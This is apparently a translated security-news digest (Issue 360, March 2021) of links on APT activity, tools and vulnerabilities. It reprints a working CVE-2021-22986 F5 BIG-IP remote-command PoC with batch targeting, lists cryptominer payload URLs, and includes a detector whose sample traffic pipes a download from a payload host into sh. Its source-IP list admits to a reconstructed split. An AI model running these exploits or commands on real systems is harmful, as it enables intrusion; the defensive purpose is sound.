Today's Threat Intelligence 2021/3/19-22 (Issue 360)

Category: Security News


Wishing all you old hands good health.


Advanced Threat Analysis


1、Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta). A veteran actor, and the samples carry plenty of C2s.

https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html


2、An attack campaign by an unknown group using 11 0-days. The watering hole looks a lot like XXX.


https://googleprojectzero.blogspot.com/2021/03/in-wild-series-october-2020-0-day.html


3、Kaspersky ICS CERT has released a report detailing the 2020 threat landscape for the ICS engineering and integration sector.

https://ics-cert.kaspersky.com/reports/2021/03/17/threat-landscape-for-the-ics-engineering-and-integration-sector-2020/


4、CISA has released a new tool (CHIRP) that detects malicious activity associated with the SolarWinds compromise in affected on-premises enterprise environments.

https://us-cert.cisa.gov/ncas/alerts/aa21-077a

https://github.com/cisagov/CHIRP/blob/main/README.md


5、New macOS malware XcodeSpy targets Xcode developers with the EggShell backdoor. Does this count as the stage before a supply-chain attack?

https://labs.sentinelone.com/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/

Technical Sharing


1、OSINT: distribution and analysis of the Russian fleet in the Black Sea

https://russianfleetanalysis.blogspot.com/2021/03/russian-forces-in-mediterranean-wk112021.html


2、CVE-2021-22986 (F5 BIG-IP RCE) XMRig cryptominer IOCs

1st payload:
http://118.107.43.174/upload/files/run.sh
http://118.107.43.174/upload/files/xmrig.tar.gz

2nd payload:
http://124.158.4.235:8080/docs/nexusa.txt
http://136.243.19.213:8885/docs/config.json
http://222.122.47.27:2143/auth/java.exe
http://27.1.1.34:8080/docs/solr.sh

Source IPs (the separators were lost in extraction; the split below is a reconstruction, so check it against the pastebin before blocking):
45.83.29.58
222.108.2.20
37.120.194.100
176.222.34.116 (listed twice in the original)
132.145.111.134
173.82.240.245
173.237.207.45
104.233.164.29
139.162.186.127
35.235.96.53
53.96.235.35
13.56.200.228
34.82.84.224
15.228.52.25
45.56.89.140
35.203.110.60
159.89.150.40
45.33.71.63
119.236.147.84
54.253.20.132
157.175.47.23
15.236.131.189
223.75.252.90
185.89.250.187
47.75.102.144

https://pastebin.com/DbYKkMmg


3、Solitude, a privacy analysis tool from NCC Group

https://github.com/nccgroup/solitude

https://research.nccgroup.com/2021/03/17/tool-release-solitude-a-privacy-analysis-tool/


4、How APT groups use tunnels (reverse proxies, and finding them with Nmap)

https://www.varonis.com/blog/nmap-reverse-proxies/


5、Finding Metasploit & Cobalt Strike URLs

https://isc.sans.edu/forums/diary/Video+Finding+Metasploit+Cobalt+Strike+URLs/27224/


6、DDoS booters now abuse DTLS servers to amplify attacks

https://www.bleepingcomputer.com/news/security/ddos-booters-now-abuse-dtls-servers-to-amplify-attacks/


Vulnerabilities


1、HW vulnerability: RCE-Exploit-in-BIG-IP (CVE-2021-22986 PoC)

import argparse
import json
import sys
import time

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# BIG-IP management interfaces usually carry self-signed certificates,
# so certificate verification is disabled for every request below.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Timestamp used to name the results file for this run.
t = int(time.time())


def poc_1(target_url, command):
    print(target_url)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
        'Content-Type': 'application/json',
        # The request shape of this PoC: an X-F5-Auth-Token header that is
        # present but empty, combined with HTTP Basic credentials (admin:ASasS).
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    # iControl REST bash utility: utilCmdArgs is passed to bash -c.
    data = json.dumps({'command': 'run', 'utilCmdArgs': '-c ' + command})
    # proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    check_url = target_url + '/mgmt/tm/util/bash'
    try:
        r = requests.post(url=check_url, data=data, headers=headers, verify=False, timeout=20)
        if r.status_code == 200 and 'commandResult' in r.text:
            default = json.loads(r.text)
            display = default['commandResult']
            save_file(target_url, t)
            print('[+] vulnerable {0}'.format(target_url))
            print('$ > {0}'.format(display))
        else:
            print('[-] Not vulnerable')
    except Exception as e:
        print('url dead {0}'.format(target_url))


def save_file(target_url, t):
    # Append each vulnerable host to Output_<timestamp>.txt, one per line.
    output_name = 'Output_{0}.txt'.format(t)
    f = open(output_name, 'a')
    f.write(target_url + '\n')
    f.close()


def format_url(url):
    # Default to https:// when no scheme is given.
    try:
        if url[:4] != "http":
            url = "https://" + url
        url = url.strip()
        return url
    except Exception as e:
        print('URL Error {0}'.format(url))


def main():
    parser = argparse.ArgumentParser("f5 rce poc")
    parser.add_argument('-u', '--url', type=str, help=' URL ')
    parser.add_argument('-f', '--file', type=str, help=' File List ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' execute commands ')
    args = parser.parse_args()

    url = args.url
    file = args.file
    command = args.command

    if url is not None:
        target_url = format_url(url)
        poc_1(target_url, command)
    elif file:
        # One target per line; blank lines are skipped.
        for url_link in open(file, 'r', encoding='utf-8'):
            if url_link.strip() != '':
                url_path = format_url(url_link.strip())
                poc_1(url_path, command)
    else:
        sys.exit(0)


if __name__ == '__main__':
    main()

https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
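Turning the request shape above into detection, as an added example that is not part of this digest, of the h4x0r-dz repository, or of F5's own tooling: it flags iControl REST requests that match the PoC (a POST to /mgmt/tm/util/bash carrying an empty X-F5-Auth-Token together with HTTP Basic credentials), decodes the Basic username, and joins any download hosts found in utilCmdArgs against the payload hosts from the XMRig IOC list in the Technical Sharing section above. The request dicts are constructed sample traffic and their field names are an assumption; map them onto whatever your reverse proxy or audit log actually records.

```python
import base64
import json
import re

# Payload hosts transcribed from the XMRig IOC list above (first- and
# second-stage download URLs). The pastebin remains the authoritative list.
PAYLOAD_HOSTS = {
    "118.107.43.174", "124.158.4.235", "136.243.19.213",
    "222.122.47.27", "27.1.1.34",
}

# Command-execution endpoint used by the PoC above.
BASH_ENDPOINT = "/mgmt/tm/util/bash"

# Pulls the host part out of any http(s) URL inside a shell command.
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)


def classify_request(req):
    """Classify one iControl REST request.

    `req` is a constructed dict {method, path, headers, body}; this field
    layout is an assumption made for the example, not a vendor log format.
    """
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    verdict = {"suspicious": False, "reasons": [], "basic_user": None,
               "command": None, "ioc_hosts": []}

    if req.get("method", "").upper() != "POST" or not req.get("path", "").startswith(BASH_ENDPOINT):
        return verdict  # only the bash utility endpoint is in scope here

    token = headers.get("x-f5-auth-token")
    auth = headers.get("authorization", "")
    # Request shape of the PoC: X-F5-Auth-Token present but empty, plus HTTP
    # Basic credentials. A client with a real session carries a non-empty
    # token and no Basic header.
    if token == "" and auth.lower().startswith("basic "):
        verdict["suspicious"] = True
        verdict["reasons"].append("empty X-F5-Auth-Token combined with Basic credentials")
        try:
            decoded = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
            verdict["basic_user"] = decoded.split(":", 1)[0]
        except ValueError:  # binascii.Error is a ValueError subclass
            verdict["basic_user"] = "<undecodable>"

    # The JSON body carries the shell command in utilCmdArgs; extract any
    # download hosts from it and join them against the miner IOCs.
    try:
        body = json.loads(req.get("body") or "{}")
    except json.JSONDecodeError:
        body = {}
    cmd = body.get("utilCmdArgs") if isinstance(body, dict) else None
    if isinstance(cmd, str):
        verdict["command"] = cmd
        hits = sorted({m.group(1) for m in URL_RE.finditer(cmd)} & PAYLOAD_HOSTS)
        if hits:
            verdict["suspicious"] = True
            verdict["ioc_hosts"] = hits
            verdict["reasons"].append("command downloads from a known XMRig payload host")
    return verdict


def scan(requests_):
    """Return the verdict for every request, in input order."""
    return [classify_request(r) for r in requests_]


# Constructed sample traffic (not real captures). Entries 0 and 3 mirror the
# PoC's request shape; 1 and 2 are what legitimate automation looks like.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": BASH_ENDPOINT,
     "headers": {"X-F5-Auth-Token": "", "Authorization": "Basic YWRtaW46QVNhc1M=",
                 "Content-Type": "application/json"},
     "body": json.dumps({"command": "run",
                         "utilCmdArgs": "-c 'curl -s http://118.107.43.174/upload/files/run.sh | sh'"})},
    {"method": "POST", "path": BASH_ENDPOINT,
     "headers": {"X-F5-Auth-Token": "E3F1A9C2B7D4", "Content-Type": "application/json"},
     "body": json.dumps({"command": "run", "utilCmdArgs": "-c 'tmsh show sys version'"})},
    {"method": "GET", "path": "/mgmt/tm/sys/version",
     "headers": {"X-F5-Auth-Token": "E3F1A9C2B7D4"}, "body": ""},
    {"method": "POST", "path": BASH_ENDPOINT,
     "headers": {"X-F5-Auth-Token": "", "Authorization": "Basic YWRtaW46QVNhc1M="},
     "body": json.dumps({"command": "run", "utilCmdArgs": "-c id"})},
]

if __name__ == "__main__":
    for i, v in enumerate(scan(SAMPLE_REQUESTS)):
        flag = "ALERT" if v["suspicious"] else "ok   "
        print(f"{flag} #{i} user={v['basic_user']} ioc={v['ioc_hosts']} reasons={v['reasons']}")
```

The header combination is specific to this PoC's request shape, so treat it as a high-confidence signal rather than the only one: also alert on any POST to /mgmt/tm/util/bash that does not originate from your management network, and keep the payload-host match independent of the header check so a miner dropped through a different path still trips it.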


2、An exploit collection worth bookmarking: 1,481 exploits / 1-days aggregated from GitHub, covering whatever your BlueTeam or RedTeam needs.

https://vxug.fakedoma.in/tmp/Exploits/


3、xterm RCE (CVE-2021-27135). How's that for impressive?

https://cvepremium.circl.lu/cve/CVE-2021-27135


4、RCE vulnerability in Apache OFBiz

https://seclists.org/oss-sec/2021/q1/255


5、Unit 42 discovers 15 new vulnerabilities in Microsoft, Adobe and Apple products

https://unit42.paloaltonetworks.com/15-new-vulnerabilities/


Cyber Warfare and Cyber Intelligence


1、Report: SRI cyber bulletin (first half of 2021)

https://www.sri.ro/assets/files/publicatii/buletin-cyber-sem-1-2021.pdf


2、The UK takes aim at China and Russia: the SAS and foreign intelligence monitoring

https://www.telegraph.co.uk/politics/2021/03/20/sas-takes-fight-meddling-russians/


3、Open-source software can play a key role in NATO's cyber defences, from intelligence sharing to building a systematic intelligence capability.

https://natoassociation.ca/open-source-software-can-play-a-key-role-in-natos-cyber-defences/


4、Russian national pleads guilty to conspiracy to introduce malware into a US company's computer network

https://www.justice.gov/opa/pr/russian-national-pleads-guilty-conspiracy-introduce-malware-us-company-s-computer-network


5、Paper (Journal of Global Security Studies)

https://academic.oup.com/jogss/article-abstract/3/4/402/5092710


6、The EU Agency for Cybersecurity (ENISA) has published new guidelines to make it easier for national telecom security authorities to report security incidents.

https://www.enisa.europa.eu/news/enisa-news/when-how-to-report-security-incidents


7、The SolarWinds Senate hearing: five key takeaways for security admins

https://www.csoonline.com/article/3610693/the-solarwinds-senate-hearing-5-key-takeaways-for-security-admins.html


8、The Council of the EU has adopted conclusions on the EU's cybersecurity strategy. This one matters, especially given the EU's recent divergent views on China and Russia.

https://www.consilium.europa.eu/en/press/press-releases/2021/03/22/cybersecurity-council-adopts-conclusions-on-the-eu-s-cybersecurity-strategy/

https://data.consilium.europa.eu/doc/document/ST-6722-2021-INIT/en/pdf




This article first appeared on the WeChat public account ThreatPage (Global Threat Intelligence): Today's Threat Intelligence 2021/3/19-22 (Issue 360)
